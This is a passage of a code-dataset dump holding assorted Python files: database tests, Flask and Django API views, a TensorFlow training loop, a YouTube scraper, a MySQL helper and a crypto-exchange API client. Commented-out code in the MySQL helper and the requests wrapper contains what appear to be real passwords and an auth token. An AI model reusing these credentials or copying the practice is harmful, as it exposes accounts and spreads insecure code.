genre=f_genre,\n track_number=track_number,\n disc_number=disc_number)\n f_session.add(music)\n f_session.commit()\n music = f_session.query(Music)\\\n .filter(Music.name == name)\\\n .first()\n assert music\n assert music.created_at\n assert name == music.name\n assert f_album.id == music.album_id\n assert track_number == music.track_number\n assert disc_number == music.disc_number\n assert f_album.id == music.album.id\n assert f_album.name == music.album.name\n assert f_genre.name == music.genre.name\n\ndef test_create_position(f_session, f_music):\n music_id = 1\n position = Position(x=10, y=9, music_id=music_id)\n f_session.add(position)\n f_session.commit()\n position = 
f_session.query(Position)\\\n .filter(Position.id == f_music.id)\\\n .first()\n assert position\n assert position.created_at\n assert 10 == position.x\n assert 9 == position.y\n assert music_id == position.music_id\n","sub_path":"tests/test_music.py","file_name":"test_music.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"441638049","text":"#!/usr/bin/env python3\nimport gc\nimport weakref\n\n\nclass ExpensiveObject(object):\n def __init__(self, name):\n self.name = name\n\n def __del__(self):\n print(\"(Deleting {})\".format(self))\n\n\nobj = ExpensiveObject(\"obj\")\np = weakref.proxy(obj)\n\nprint(\"BEFORE:\", p.name)\nobj = None\nprint(\"AFTER:\", p.name)","sub_path":"language_tools/_exceptions/exceptions_referenceerror.py","file_name":"exceptions_referenceerror.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"556476682","text":"#!/usr/bin/python\n\"\"\"\nCopyright (c) 2015 by Lilee Technology, Ltd.\nAll rights reserved.\n\nerc_job_producer.py\n\nPython module to create two kinds of job for erc to execute:\n1. 5502 on-demand CHMM log job\n2. Periodic CHMM log job\n\n\"\"\"\n\nimport os\nimport re\nimport copy\nimport threading\nimport time\nimport datetime\n\n\nfrom logger import Logger\n\n\nclass PeriodicJob(object):\n def __init__(self, job_type, log_period):\n self.type = job_type\n self.log_period = log_period\n self.seq_num = 0\n Logger.info(\"PeriodicJob\", 'New job:' + job_type + ' Log period:' + str(log_period))\n\n\nclass PeriodicJobsProducer(threading.Thread):\n \"\"\"\n Produce periodic log request to jobs queue.\n Period = every x mins = log_period, this values comes from lilee-erc.cfg file\n \"\"\"\n def __init__(self, jobs_queue, config_attr):\n threading.Thread.__init__(self)\n self.jobs_queue = jobs_queue\n self.log_period = config_attr[\"log_period\"]\n if not os.path.exists(config_attr[\"log_path\"]):\n Logger.error(\"PeriodicJobsProducer\", \"Log repository not found: \" + config_attr[\"log_path\"])\n os.mkdir(config_attr[\"log_path\"])\n\n def run(self):\n\n while True:\n self.jobs_queue.put(PeriodicJob('recent', self.log_period))\n Logger.info(\"PeriodicJobsProducer\", \"Put job in the queue, #: \" + str(self.jobs_queue.qsize()))\n time.sleep(int(self.log_period))\n\n\nclass OnDemandJob(object):\n def __init__(self, job_type, start_time, end_time, seq_num, ondemand_file_name):\n self.type = job_type\n self.start_time = start_time\n self.end_time = end_time\n self.seq_num = seq_num\n self.ondemand_file_name = ondemand_file_name\n Logger.info(\"OnDemandJob\", ' Start time:' + str(self.start_time) +\n ' End time:' + str(self.end_time))\n return\n\n # def add_retry_count(self):\n # self.retry_count += 1\n # return\n\n\nclass OnDemandJobsProducer(threading.Thread):\n \"\"\"\n Produce on-demand log request to jobs queue.\n Request comes from Lilee SMA in a .req file format (RequestTime_LogStartTime_LogEndTime_MsgSeqNum.req)\n \"\"\"\n def __init__(self, jobs_queue, config_attr):\n threading.Thread.__init__(self)\n self.jobs_queue = jobs_queue\n self.config_attr = config_attr\n if not os.path.exists(config_attr[\"ondemand_req_path\"]):\n os.mkdir(config_attr[\"ondemand_req_path\"])\n\n def run(self):\n while True:\n try:\n Logger.info(\"OnDemandJobsProducer.run\", \"Check on demand req \" +\n str(self.config_attr[\"ondemand_chk_period\"]) + \" sec\")\n list_onDemand_jobs = 
self.check_onDemand_req()\n if list_onDemand_jobs:\n for onDemand_job in list_onDemand_jobs:\n self.jobs_queue.put(onDemand_job)\n time.sleep(int(self.config_attr[\"ondemand_chk_period\"]))\n except Exception as e:\n Logger.error(\"OnDemandJobsProducer.run\", str(e))\n\n def check_onDemand_req(self):\n \"\"\"\n This function is called to check on-demand request\n valid request is a file come from Lilee-SMA with name format: RequsetTime_LogStartTime_LogEndTime_MsgSeqNum.req\n Args:\n Returns:\n List of sorted onDemand jobs\n \"\"\"\n list_onDemand_jobs = []\n try:\n for file_name in os.listdir(self.config_attr[\"ondemand_req_path\"]):\n file_name_new = re.search(r'^([0-9]{10})_([0-9]{10})_([0-9]{10})_([0-9]*)\\.req$', file_name)\n if file_name_new is not None:\n start_time_ux = file_name_new.group(2)\n start_time = datetime.datetime.fromtimestamp(int(start_time_ux)).strftime('%m/%d/%Y %H:%M:%S')\n end_time_ux = file_name_new.group(3)\n end_time = datetime.datetime.fromtimestamp(int(end_time_ux)).strftime('%m/%d/%Y %H:%M:%S')\n seq_num = int(file_name_new.group(4))\n ondemand_job = OnDemandJob(\"batch\", start_time, end_time, seq_num, file_name)\n list_onDemand_jobs.append(copy.copy(ondemand_job))\n os.rename(self.config_attr[\"ondemand_req_path\"] +\n file_name, self.config_attr[\"ondemand_req_path\"] + file_name + \".q\")\n Logger.info(\"OnDemandJobsProducer.check_onDemand_req\", \"Add on-demand job: \" + str(start_time) +\n \" - \" + str(end_time) + \", \" + str(seq_num))\n except Exception as e:\n Logger.error(\"OnDemandJobsProducer.check_onDemand_req\", str(e))\n finally:\n sorted(list_onDemand_jobs, key=self.get_sort_key)\n if len(list_onDemand_jobs) > 0:\n Logger.info(\"OnDemandJobsProducer.check_onDemand_req\", str(list_onDemand_jobs[0].seq_num))\n return list_onDemand_jobs\n\n def get_sort_key(self, ondemand_job):\n return int(ondemand_job.seq_num)\n","sub_path":"src/erc_job_producer.py","file_name":"erc_job_producer.py","file_ext":"py","file_size_in_byte":4627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"108081767","text":"if __name__ == '__main__':\n import argparse\n from .tools import aviation_weather\n PARSER = argparse.ArgumentParser(description='Get metars or tafs for the specified stations')\n PARSER.add_argument('--hours-before-now', required=False, default=24,\n help='hours before now')\n PARSER.add_argument('--most-recent', '-r', required=False, default=True, action='store_true',\n help='Only return most recent metars or tafs for the stations')\n PARSER.add_argument('data_source', choices=['metars', 'tafs'])\n PARSER.add_argument('--text', '-t', required=False, default=True, action='store_true',\n help='display in human-readable text format')\n PARSER.add_argument('stations', nargs='+',\n help='station code or short code for multiple stations')\n ARGS = PARSER.parse_args()\n STATIONS = ','.join(ARGS.stations)\n RESULT = aviation_weather(ARGS.data_source, STATIONS,\n ARGS.hours_before_now, ARGS.most_recent,\n ARGS.text)\n if ARGS.text:\n print(RESULT)\n elif len(RESULT) > 0:\n print('\\n'.join(RESULT))\n else:\n raise ValueError(\"Error encountered outputting results.\")\n","sub_path":"aviation_weather/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"4655336","text":"from flask import request, jsonify\nimport json\nfrom . 
import user_api\nfrom ...models.User import UserModel, user_schema\nfrom ...Middleware.JWTToken import JWTToken\nfrom .response import user_response\nfrom ...shared.EmailService import EmailService\n\n@user_api.route('', methods=['POST'])\ndef create_user():\n \"\"\"\n Create a user\n \"\"\"\n user_data = request.get_json()\n data, error = user_schema.load(user_data)\n \n if error:\n return user_response(error, 400)\n \n # check if user already exist\n find_user = UserModel.query.filter((UserModel.email==data.get('email')) | (UserModel.phone_number==data.get('phone_number'))).first()\n \n if find_user:\n return user_response({'error': 'User already exist, please use a different email or phone number'}, 400)\n \n user = UserModel(data)\n user.save()\n response = user_schema.dump(user).data\n # generate token using user id as paylaod\n token = JWTToken.generate_token(response.get('id'))\n \n # send email activation to user\n recipient_email = response.get('email')\n activation_token = JWTToken.generate_token(recipient_email)\n EmailService.send_account_activation_email(activation_token, recipient_email)\n\n return user_response({'token': token}, 201)\n","sub_path":"src/Views/UserView/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"372869854","text":"from django.conf import settings\n\nfrom rest_framework.decorators import api_view\n\nfrom common.helpers import PrettyJsonResponse as JsonResponse\n\nfrom .models import Lock, Course, Depts, ModuleA, ModuleB\n\nfrom .app_helpers import get_student_timetable, get_custom_timetable\n\nfrom common.decorators import uclapi_protected_endpoint\n\n_SETID = settings.ROOMBOOKINGS_SETID\n\n\n@api_view([\"GET\"])\n@uclapi_protected_endpoint(personal_data=True, required_scopes=['timetable'])\ndef get_personal_timetable(request, *args, **kwargs):\n token = kwargs['token']\n user = token.user\n try:\n date_filter = request.GET[\"date_filter\"]\n timetable = get_student_timetable(user.employee_id, date_filter)\n except KeyError:\n timetable = get_student_timetable(user.employee_id)\n\n response = {\n \"ok\": True,\n \"timetable\": timetable\n }\n return JsonResponse(response, rate_limiting_data=kwargs)\n\n\n@api_view([\"GET\"])\n@uclapi_protected_endpoint()\ndef get_modules_timetable(request, *args, **kwargs):\n module_ids = request.GET.get(\"modules\")\n if module_ids is None:\n return JsonResponse({\n \"ok\": False,\n \"error\": \"No module IDs provided.\"\n }, rate_limiting_data=kwargs)\n\n try:\n modules = module_ids.split(',')\n except ValueError:\n return JsonResponse({\n \"ok\": False,\n \"error\": \"Invalid module IDs provided.\"\n }, rate_limiting_data=kwargs)\n\n try:\n date_filter = request.GET[\"date_filter\"]\n custom_timetable = get_custom_timetable(modules, date_filter)\n except KeyError:\n custom_timetable = get_custom_timetable(modules)\n\n if custom_timetable:\n response_json = {\n \"ok\": True,\n \"timetable\": custom_timetable\n }\n return JsonResponse(response_json, rate_limiting_data=kwargs)\n else:\n response_json = {\n \"ok\": False,\n \"error\": \"One or more invalid Module IDs supplied.\"\n }\n response = JsonResponse(response_json, rate_limiting_data=kwargs)\n response.status_code = 400\n return response\n\n\n@api_view([\"GET\"])\n@uclapi_protected_endpoint()\ndef get_departments(request, *args, **kwargs):\n \"\"\"\n Returns all departments at UCL\n \"\"\"\n depts = {\"ok\": True, \"departments\": []}\n 
for dept in Depts.objects.all():\n depts[\"departments\"].append({\n \"department_id\": dept.deptid,\n \"name\": dept.name\n })\n return JsonResponse(depts, rate_limiting_data=kwargs)\n\n\n@api_view([\"GET\"])\n@uclapi_protected_endpoint()\ndef get_department_courses(request, *args, **kwargs):\n \"\"\"\n Returns all the courses in UCL with relevant ID\n \"\"\"\n try:\n department_id = request.GET[\"department\"]\n except KeyError:\n response = JsonResponse({\n \"ok\": False,\n \"error\": \"Supply a Department ID using the department parameter.\"\n }, rate_limiting_data=kwargs)\n response.status_code = 400\n return response\n\n courses = {\"ok\": True, \"courses\": []}\n for course in Course.objects.filter(owner=department_id, setid=_SETID):\n courses[\"courses\"].append({\n \"course_name\": course.name,\n \"course_id\": course.courseid,\n \"years\": course.numyears\n })\n return JsonResponse(courses, rate_limiting_data=kwargs)\n\n\n@api_view([\"GET\"])\n@uclapi_protected_endpoint()\ndef get_department_modules(request, *args, **kwargs):\n \"\"\"\n Returns all modules taught by a particular department.\n \"\"\"\n try:\n department_id = request.GET[\"department\"]\n except KeyError:\n response = JsonResponse({\n \"ok\": False,\n \"error\": \"Supply a Department ID using the department parameter.\"\n }, rate_limiting_data=kwargs)\n response.status_code = 400\n return response\n\n modules = {\"ok\": True, \"modules\": []}\n lock = Lock.objects.all()[0]\n m = ModuleA if lock.a else ModuleB\n for module in m.objects.filter(owner=department_id, setid=_SETID):\n modules[\"modules\"].append({\n \"module_id\": module.moduleid,\n \"name\": module.name,\n \"module_code\": module.linkcode,\n \"class_size\": module.csize\n })\n\n return JsonResponse(modules, rate_limiting_data=kwargs)\n","sub_path":"backend/uclapi/timetable/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"137133408","text":"# Copyright 2016 Stanford University\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\nimport os\nimport sys\nimport time\nimport random\nimport json\nfrom os.path import join as pjoin\n\nimport numpy as np\nfrom six.moves import xrange\nimport tensorflow as tf\n\nimport model_concat\nfrom flag import FLAGS\nfrom data_generate import pair_iter, id2char\n\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\n\ndef create_model(session, vocab_size_char, vocab_size_word):\n model = model_concat.Model(FLAGS.size, FLAGS.num_wit, FLAGS.num_layers,\n FLAGS.max_gradient_norm, FLAGS.learning_rate,\n FLAGS.learning_rate_decay_factor, forward_only=False,\n optimizer=FLAGS.optimizer)\n model.build_model(vocab_size_char, model=FLAGS.model,\n flag_bidirect=FLAGS.flag_bidirect, 
model_sum=FLAGS.flag_sum)\n ckpt = tf.train.get_checkpoint_state(FLAGS.train_dir)\n num_epoch = 0\n if ckpt:\n logging.info(\"Reading model parameters from %s\" % ckpt.model_checkpoint_path)\n model.saver.restore(session, ckpt.model_checkpoint_path)\n num_epoch = int(ckpt.model_checkpoint_path.split('-')[1])\n print (num_epoch)\n else:\n logging.info(\"Created model with fresh parameters.\")\n session.run(tf.global_variables_initializer())\n logging.info('Num params: %d' % sum(v.get_shape().num_elements() for v in tf.trainable_variables()))\n return model, num_epoch\n\n\ndef validate(model, sess, cur_len):\n valid_costs, valid_lengths = [], []\n for source_tokens, source_mask, target_tokens in pair_iter(FLAGS.data_dir,\n FLAGS.dev, FLAGS.num_wit,\n cur_len=cur_len,\n num_top=FLAGS.num_top,\n max_seq_len=FLAGS.max_seq_len,\n data_random=FLAGS.random,\n batch_size=FLAGS.batch_size,\n prior=FLAGS.prior,\n prob_high=FLAGS.prob_high,\n prob_in=FLAGS.prob_in,\n flag_generate=FLAGS.flag_generate,\n prob_back=FLAGS.prob_back):\n cost = model.test(sess, source_tokens, source_mask, target_tokens)\n valid_costs.append(cost * source_mask.shape[1])\n valid_lengths.append(np.sum(source_mask))\n valid_cost = sum(valid_costs) / float(sum(valid_lengths))\n return valid_cost\n\n\ndef train():\n \"\"\"Train a translation model using NLC data.\"\"\"\n # Prepare NLC data.\n logging.info(\"Get NLC data in %s\" % FLAGS.data_dir)\n vocab_size = len(id2char)\n logging.info(\"Vocabulary size: %d\" % vocab_size)\n if not os.path.exists(FLAGS.train_dir):\n os.makedirs(FLAGS.train_dir)\n file_handler = logging.FileHandler(\"{0}/log.txt\".format(FLAGS.train_dir))\n logging.getLogger().addHandler(file_handler)\n # with open(os.path.join(FLAGS.train_dir, \"flags.json\"), 'w') as fout:\n # json.dump(FLAGS.__flags, fout)\n with tf.Session() as sess:\n logging.info(\"Creating %d layers of %d units.\" % (FLAGS.num_layers, FLAGS.size))\n model, epoch = create_model(sess, vocab_size, False)\n\n if False:\n tic = time.time()\n params = tf.trainable_variables()\n num_params = sum(map(lambda t: np.prod(tf.shape(t.value()).eval()), params))\n toc = time.time()\n print (\"Number of params: %d (retreival took %f secs)\" % (num_params, toc - tic))\n\n best_epoch = epoch\n best_cost = float('inf')\n previous_losses = []\n exp_cost = None\n exp_length = None\n exp_norm = None\n total_iters = 0\n start_time = time.time()\n cur_len = -2\n # if epoch >= 1:\n # if FLAGS.flag_varlen:\n # best_cost = validate(model, sess, epoch)\n # else:\n # best_cost = validate(model, sess, cur_len - 1)\n\n while (FLAGS.epochs == 0 or epoch < FLAGS.epochs):\n epoch += 1\n current_step = 0\n\n ## Train\n epoch_tic = time.time()\n if FLAGS.flag_varlen:\n cur_len = epoch - 1\n\n print('epoch', epoch, cur_len)\n for source_tokens, source_mask, target_tokens in pair_iter(FLAGS.data_dir, 'train',\n FLAGS.num_wit,\n cur_len=cur_len,\n num_top=FLAGS.num_top,\n max_seq_len=FLAGS.max_seq_len,\n batch_size=FLAGS.batch_size,\n data_random=FLAGS.random,\n prior=FLAGS.prior,\n prob_high=FLAGS.prob_high,\n prob_in=FLAGS.prob_in,\n flag_generate=FLAGS.flag_generate,\n prob_back=FLAGS.prob_back,\n sort_and_shuffle=True):\n # Get a batch and make a step.\n tic = time.time()\n grad_norm, cost, param_norm = model.train(sess, source_tokens, source_mask, target_tokens, FLAGS.keep_prob)\n toc = time.time()\n iter_time = toc - tic\n total_iters += np.sum(source_mask)\n tps = total_iters / (time.time() - start_time)\n current_step += 1\n print('iter', current_step)\n lengths = 
np.sum(source_mask, axis=0)\n mean_length = np.mean(lengths)\n std_length = np.std(lengths)\n\n if not exp_cost:\n exp_cost = cost\n exp_length = mean_length\n exp_norm = grad_norm\n else:\n exp_cost = 0.99*exp_cost + 0.01*cost\n exp_length = 0.99*exp_length + 0.01*mean_length\n exp_norm = 0.99*exp_norm + 0.01*grad_norm\n\n cost = cost / mean_length\n\n if current_step % FLAGS.print_every == 0:\n logging.info('epoch %d, iter %d, cost %f, exp_cost %f, grad norm %f, param norm %f, tps %f, length mean/std %f/%f' %\n (epoch, current_step, cost, exp_cost / exp_length, grad_norm, param_norm, tps, mean_length, std_length))\n epoch_toc = time.time()\n\n ## Checkpoint\n checkpoint_path = os.path.join(FLAGS.train_dir, \"best.ckpt\")\n\n ## Validate\n valid_cost = validate(model, sess, cur_len)\n\n logging.info(\"Epoch %d Validation cost: %f time: %f\" % (epoch, valid_cost, epoch_toc - epoch_tic))\n\n\n if len(previous_losses) > 2 and valid_cost > previous_losses[-1]:\n logging.info(\"Annealing learning rate by %f\" % FLAGS.learning_rate_decay_factor)\n sess.run(model.lr_decay_op)\n model.saver.restore(sess, checkpoint_path + (\"-%d\" % best_epoch))\n else:\n previous_losses.append(valid_cost)\n best_epoch = epoch\n model.saver.save(sess, checkpoint_path, global_step=epoch)\n sys.stdout.flush()\n\n\ndef main(_):\n train()\n\nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"588902091","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport youtube_driver.get_authenticated as GetAuthenticated\nimport youtube_driver.get_comments as GetComments\nimport youtube_driver.get_images as GetImages\nimport time\n\t\t\nimport sys\nimport click\n\n@click.command()\n@click.option('--keys', '-k', multiple=True, default=[], help='A list of video names that we are searching.')\n\ndef main(keys):\n\n ''' \n Scraping conversations in youtube based on the video names.\n '''\n\n keys = list(keys)\n file_pos = 0\n if (len(keys) > 0): # If code_secret_file_name and keys are specified.\n click.echo('reading from arguments')\n getAuthenticated = GetAuthenticated.GetAuthenticated(file_pos) # Read authentification informations from code_secret_file\n youtube, file_num = getAuthenticated.get_authenticated()\n for key in keys: \n # Start searching for the video.\n while(file_pos < file_num):\n try:\n request = youtube.search().list(\n part=\"snippet\",\n maxResults=25,\n q=str(key)\n )\n response = request.execute()\n break\n except:\n file_pos += 1\n getAuthenticated = GetAuthenticated.GetAuthenticated(file_pos) # Read authentification informations from code_secret_file\n youtube, file_num = getAuthenticated.get_authenticated()\n pass\n while(response):\n time.sleep(1)\n for (index,item) in enumerate(response['items']):\n while(file_pos < file_num):\n try:\n try:\n videoId = str(item['id']['videoId']) # Get the video id.\n except:\n continue\n # Start scraping the video comments.\n request2 = youtube.commentThreads().list(\n part=\"snippet,replies\",\n videoId=str(videoId)\n )\n try:\n response2 = request2.execute()\n except: # The video is private.\n continue\n\n getComments = GetComments.GetComments(response2, youtube)\n getComments.get_comments()\n break\n except:\n file_pos += 1\n getAuthenticated = GetAuthenticated.GetAuthenticated(file_pos) # Read authentification informations from 
code_secret_file\n youtube, file_num = getAuthenticated.get_authenticated()\n pass\n\n if(len(keys) == 0):\n click.echo('Missing key')\t\n\n\t\t","sub_path":"Scraping/Scraping_YouTube/youtube_driver/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"232743688","text":"import gensim\n\nclass Sentence(object):\n def __init__(self, inputStr):\n self.Fname = inputStr\n\n def __iter__(self):\n inputFile = open(self.Fname, mode=\"r\", encoding=\"UTF-8\")\n for line in inputFile:\n line = line.strip().replace(\" \", \"\")\n wordList = [word for word in line]\n yield wordList\n\n\nMysentence = Sentence(\"data/train.txt\")\nprint(\"hhhh\")\nmodel=gensim.models.Word2Vec(Mysentence, size=100, window=5, min_count=1, iter=10, workers=4)\nmodel.save(\"word2vec\")\nprint(\"hhhh\")\nprint(model[\"我\"])","sub_path":"word2vector/word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"462427706","text":"import mysql.connector\nimport datetime\n\n\nclass Set_Mysql():\n def __init__(self,_id,_title,_class,_content , _conn , _db):\n self._id = _id\n self._title = _title\n self._class = _class\n self._content = _content\n self._conn = _conn\n self._db = _db\n def Connect_To_Sql(self):\n self._mycursor = self._conn.cursor()\n self._mycursor.execute('use ' + str(self._db))\n def prevent_duplicate(self):\n title_data = (self._title,)\n sql = \"select * from mangerdb_item where title = %s\"\n self._mycursor.execute(sql, title_data)\n myresult = self._mycursor.fetchall()\n if myresult:\n print('重複的資料', 'id', self._id, '標題', title_data[0])\n else:\n try:\n insert_sql = \"insert ignore into mangerdb_item (id , title ,Myclass , content) values (%s,%s,%s,%s)\"\n insert_data = (self._id, self._title, self._class, self._content)\n self._mycursor.execute(insert_sql, insert_data)\n self._conn.commit()\n except mysql.connector.Error as error:\n self._conn.rollback()\n finally:\n if self._mycursor.rowcount:\n print(\"資料成功輸入\")\n else:\n time_id = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\n insert_data = (time_id, self._title, self._class, self._content)\n self._mycursor.execute(insert_sql, insert_data)\n self._conn.commit()\n print(self._mycursor.rowcount, \"record inserted.\", \"id改為時間參數\")\n\n\n# mydb = mysql.connector.connect(\n# user='root',\n# passwd='April29love',\n# host='localhost',\n# database='test ',\n# )\n#\n# mycursor = mydb.cursor()\n# mycursor.execute('use mangerdb')\n#\n# def prevent_duplicate(id,title,MyClass,content):\n# # test_id = (id,)\n# test_title = (title,)\n#\n# print(\"title\" , test_title)\n#\n# sql = \"select * from mangerdb_item where title = %s\"\n# mycursor.execute(sql,test_title)\n# myresult = mycursor.fetchall()\n# if myresult:\n# print('重複的資料','id',id,'標題',test_title[0])\n# else:\n# try:\n# insert_sql = \"insert ignore into mangerdb_item (id , title ,Myclass , content) values (%s,%s,%s,%s)\"\n# insert_data = (id,title,MyClass,content)\n# mycursor.execute(insert_sql,insert_data)\n# mydb.commit()\n# except mysql.connector.Error as error:\n# mydb.rollback()\n# finally:\n# if mycursor.rowcount:\n# print(\"資料成功輸入\")\n# else:\n# time_id = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\n# insert_data = (time_id, title, MyClass, content)\n# mycursor.execute(insert_sql, insert_data)\n# mydb.commit()\n# print(mycursor.rowcount, \"record 
inserted.\", \"id改為時間參數\")\n#\n","sub_path":"0927_KFC_crawl/insert_mysql.py","file_name":"insert_mysql.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"90127847","text":"import requests\nimport json\nfrom pprint import pprint\n\n\ndef request(method, url, data, token, is_urlencoded=True):\n method = method.upper()\n if method not in ('GET', 'POST'):\n raise Exception('올바른 형식을 입력해 주세요')\n if method == 'GET':\n headers = {'Content-Type': 'application/json'}\n if token != '':\n headers['Authorization'] = f'Token {token}'\n res = requests.get(url=url, params=data, headers=headers)\n elif method == 'POST':\n headers = {}\n if token != '':\n headers['Authorization'] = f'Token {token}'\n if is_urlencoded is True:\n headers['Content-Type'] = 'application/x-www-form-urlencoded'\n res = requests.post(\n url=url, data=json.dumps(data), headers=headers)\n else:\n headers['Content-Type'] = 'application/json'\n res = requests.post(\n url=url, data=json.dumps(data), headers=headers)\n\n dict_meta = {'status_code': res.status_code, 'ok': res.ok,\n 'encoding': res.encoding, 'Content-Type': res.headers['Content-Type']}\n if 'json' in str(res.headers['Content-Type']):\n return {**dict_meta, **res.json()}\n else:\n return {**dict_meta, **{'text': res.text}}\n\n\nhost = 'http://localhost:8000'\n\n# GET으로 포스트 가져오기\nroute_get = \"/api/posts\"\nget_url = host + route_get\nres = request(method='GET', url=get_url, data={'': ''}, token='')\nif res['ok'] == True:\n pprint(res)\nelse:\n print('오류')\n\n# # POST로 로그인하기\n# route_post = \"/api/auth/login/\"\n# post_url = host + route_post\n# data = {'username': 'ydh2244', 'password': '1127star'}\n# res = request(method='POST', url=post_url, data=data, token='')\n# if res['ok'] == True:\n# pprint(res)\n# else:\n# print('오류')\n\n# # post 보내기 + 토큰\n# route_post = \"/api/posts/\"\n# post_url = host + route_post\n# data = {\n# \"category\": \"board\",\n# \"content\": \"안녕하세요\",\n# \"title\": \"안녕하세요\",\n# \"username\": \"염동환\",\n# \"profileid\": 1\n# }\n# token = 'd9f37c894c1ae9d18084249c367dd640e4ff4968e5f65f0d2473a61281610ff4'\n# res = request(method='POST', url=post_url, data=data,\n# token=token, is_urlencoded=False)\n# if res['ok'] == True:\n# pprint(res)\n# else:\n# print('오류')\n\n# # user 로그인 체크하기\n# route_post = \"/api/auth/user/\"\n# post_url = host + route_post\n# data = {'username': 'ydh2244', 'password': '1127star'}\n# token = 'd9f37c894c1ae9d18084249c367dd640e4ff4968e5f65f0d2473a61281610ff4'\n# res = request(method='GET', url=post_url, data=data, token=token)\n# if res['ok'] == True:\n# pprint(res)\n# else:\n# pass\n# route_post = \"/api/auth/login/\"\n# post_url = host + route_post\n# data = {'username': 'ydh2244', 'password': '1127star'}\n# res = request(method='POST', url=post_url, data=data, token='')\n# if res['ok'] == True:\n# pprint(res)\n# else:\n# print('오류')\n","sub_path":"카카오연습용 프론트/register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"591017307","text":"#! 
/usr/bin/python\n# -*- encoding: utf-8 -*-\n# @Author: DZF\nimport hashlib\nimport hmac\nimport time\nfrom collections import OrderedDict\nfrom urllib.parse import urlencode\nimport accountConfig\nimport urllib\nimport urllib.parse\nimport urllib.request\n\nimport requests\n\n# Nonce Length\nJUBI_NONCE_LENGHT = 12\n\nACCESS_KEY = accountConfig.JUBI[\"CNY_1\"][\"ACCESS_KEY\"]\nSECRET_KEY = accountConfig.JUBI[\"CNY_1\"][\"SECRET_KEY\"]\nSERVICE_API = accountConfig.JUBI[\"CNY_1\"][\"SERVICE_API\"]\n\n\ndef getMd5Hash(s):\n m = hashlib.md5()\n m.update(s)\n return m.hexdigest()\n\ndef generate_signature(msg, private_key):\n msg = msg.encode(encoding='UTF8')\n k = getMd5Hash(private_key.encode(encoding='UTF8')).encode(encoding='UTF8')\n signature = hmac.new(k, msg, digestmod=hashlib.sha256).hexdigest()\n return signature\n\n\ndef reformat_params(params, private_key):\n orderDict = OrderedDict(params)\n param_str = urlencode(orderDict)\n #param_str = '&'.join(['%s=%s' % (str(k), str(v)) for (k, v) in orderDict.items()])\n signature = generate_signature(param_str, private_key)\n orderDict['signature'] = signature\n return orderDict\n\n\ndef get2api(pParams, method):\n request_url = SERVICE_API + method\n return httpGet(request_url, pParams)\n\n\ndef send2api(pParams, method):\n pParams['key'] = ACCESS_KEY\n pParams['nonce'] = int(time.time() * 1000)\n pParams = reformat_params(pParams, SECRET_KEY)\n request_url = SERVICE_API + method\n print(pParams)\n # if (extra):\n # for k in extra:\n # v = extra.get(k)\n # if (v != None):\n # pParams[k] = v\n # pParams.update(extra)\n return httpRequest(request_url, pParams)\n\n\n'''\n生成签名\n'''\n\n\ndef createSign(params):\n params['secret_key'] = SECRET_KEY\n params = sorted(params.items(), key=lambda d: d[0], reverse=False)\n message = urllib.parse.urlencode(params)\n message = message.encode(encoding='UTF8')\n m = hashlib.md5()\n m.update(message)\n m.digest()\n sig = m.hexdigest()\n return sig\n\n\ndef httpGet(url, params):\n print(url)\n headers = {\n \"Content-type\": \"application/x-www-form-urlencoded\",\n }\n\n postdata = urllib.parse.urlencode(params)\n # postdata = postdata.encode('utf-8')\n response = requests.get(url, postdata, headers=headers, timeout=20)\n if response.status_code == 200:\n return response.json()\n else:\n print(response.status_code)\n\n raise Exception(\"httpPost failed, detail is:%s\" % response.text)\n\n'''\nrequest\n'''\n\n\ndef httpRequest(url, params):\n print(url)\n '''\n postdata = urllib.parse.urlencode(params)\n postdata = postdata.encode('utf-8')\n\n fp = urllib.request.urlopen(url, postdata, timeout = 20)\n if fp.status != 200:\n return None\n else:\n mybytes = fp.read()\n mystr = mybytes.decode(\"utf8\")\n fp.close()\n return mystr\n '''\n headers = {\n \"Content-type\": \"application/x-www-form-urlencoded\",\n }\n\n postdata = urllib.parse.urlencode(params)\n # postdata = postdata.encode('utf-8')\n response = requests.post(url, postdata, headers=headers, timeout=20)\n if response.status_code == 200:\n return response.json()\n else:\n print(response.status_code)\n\n raise Exception(\"httpPost failed, detail is:%s\" % response.text)\n\n\nif __name__ == 